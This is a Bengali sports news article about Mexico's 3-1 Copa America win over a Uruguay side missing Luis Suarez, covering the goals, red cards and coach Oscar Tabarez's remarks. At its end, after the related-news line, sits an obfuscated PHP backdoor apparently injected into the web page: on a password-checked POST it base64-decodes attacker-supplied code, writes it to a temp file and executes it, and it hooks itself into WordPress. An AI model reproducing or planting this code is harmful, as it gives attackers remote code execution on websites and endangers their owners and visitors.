মঙ্গলবার, ১৮ই জুন, ২০২৪ খ্রিস্টাব্দ ৪ঠা আষাঢ়, ১৪৩১ বঙ্গাব্দ

সুয়ারেজকে ছাড়া হারল উরুগুয়ে

 

স্পোর্টস ডেস্ক :উরুগুয়ের বিপক্ষে জয়সূচক গোলের পর উল্লাসে মেতেছেন মেক্সিকোর ফুটবলাররা। ছবি: রয়টার্স
বার্সেলোনার জার্সি গায়ে দারুণ এক মৌসুম কাটিয়ে শেষমুহূর্তে ইনজুরির কবলে পড়েছিলেন উরুগুয়ের তারকা স্ট্রাইকার লুইস সুয়ারেজ। আর সেই চোটের কারণে খেলতে পারেননি মেক্সিকোর বিপক্ষে কোপা আমেরিকার প্রথম ম্যাচ। সুয়ারেজের অভাবটাও হাড়ে হাড়ে টের পেয়েছে উরুগুয়ে। মেক্সিকোর বিপক্ষে নিজেদের প্রথম ম্যাচে মাঠ ছেড়েছে ৩-১ গোলের হার নিয়ে।

0,,17734539_303,00

৮৪ মিনিট পর্যন্ত ১-১ গোলের সমতার পর শেষ সাত মিনিটেই বাজিমাত করেছে মেক্সিকো। ৮৫ মিনিটে দুর্দান্ত এক শটে গোল করেছেন মেক্সিকোর অধিনায়ক রাফায়েল মার্কুয়েজ। আর শেষ বাঁশি বাজার দুই মিনিট আগে উরুগুয়ের জালে আরেকবার বল জড়িয়ে দিয়েছেন মিগুয়েল হেরেরা।

শেষমুহূর্তের দুই গোলে নাটকীয় জয় পেলেও ম্যাচের প্রায় পুরোটা সময়ই উরুগুয়েকে চাপের মুখে রেখেছিল মেক্সিকো। শুরুতে উরুগুয়ের রক্ষণভাগের দুর্বলতায় এগিয়ে গিয়েছিল তারা। ৪ মিনিটের মাথায় আত্মঘাতি গোল করেছিলেন উরুগুয়ের ডিফেন্ডার আলভারো পেরেইরা। প্রথমার্ধ শেষ হওয়ার আগ মুহূর্তে উরুগুয়ে পড়ে গিয়েছিল আরও চাপের মুখে। দ্বিতীয় হলুদ কার্ড দেখে মাঠ ছেড়েছিলেন মিডফিল্ডার মাতিয়াস ভেকিনো।

৭৩ মিনিটের মাথায় মেক্সিকোও পরিণত হয় দশ জনের দলে। দ্বিতীয় হলুদ কার্ড দেখে মাঠ ছাড়েন মেক্সিকোর ডিফেন্ডার আন্দ্রেস গুয়ার্দাদো। খেলোয়াড়ের সমতার পর গোলের সমতা ফেরাতেও খুব বেশি দেরি হয়নি উরুগুয়ের। ৭৪ মিনিটে হেড থেকে গোল করেন অধিনায়ক ডিয়েগো গডিন। এসময় অনেকেই হয়তো মনে করেছিলেন যে, পয়েন্ট ভাগাভাগি করে নিতে হবে উরুগুয়ে-মেক্সিকোকে। কিন্তু শেষমুহূর্তের নাটকীয়তায় ৩-১ গোলের জয় পেয়েছে মেক্সিকো।

হার দিয়ে শুরুটা ভালোভাবে করতে না পারলেও শিষ্যদের পারফরম্যান্সে সন্তুষ্টিই প্রকাশ করেছেন উরুগুয়ের কোচ অস্কার তাবারেজ। ম্যাচ শেষে তিনি বলেছেন, ‘আমরা যেভাবে খেলায় ফিরে এসেছি আর সবাই যেরকম সাহসিকতার সঙ্গে খেলেছে, তাতে আমি গর্বিত।’ এখন শিরোপা জয়ের লড়াইয়ে টিকে থাকার জন্য ভেনেজুয়েলার বিপক্ষে নিজেদের দ্বিতীয় ম্যাচটি জিততেই হবে উরুগুয়েকে।

কোপা আমেরিকার অপর ম্যাচে ভেনেজুয়েলা ১-০ গোলে হারিয়েছে জ্যামাইকাকে।

এ জাতীয় আরও খবর

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}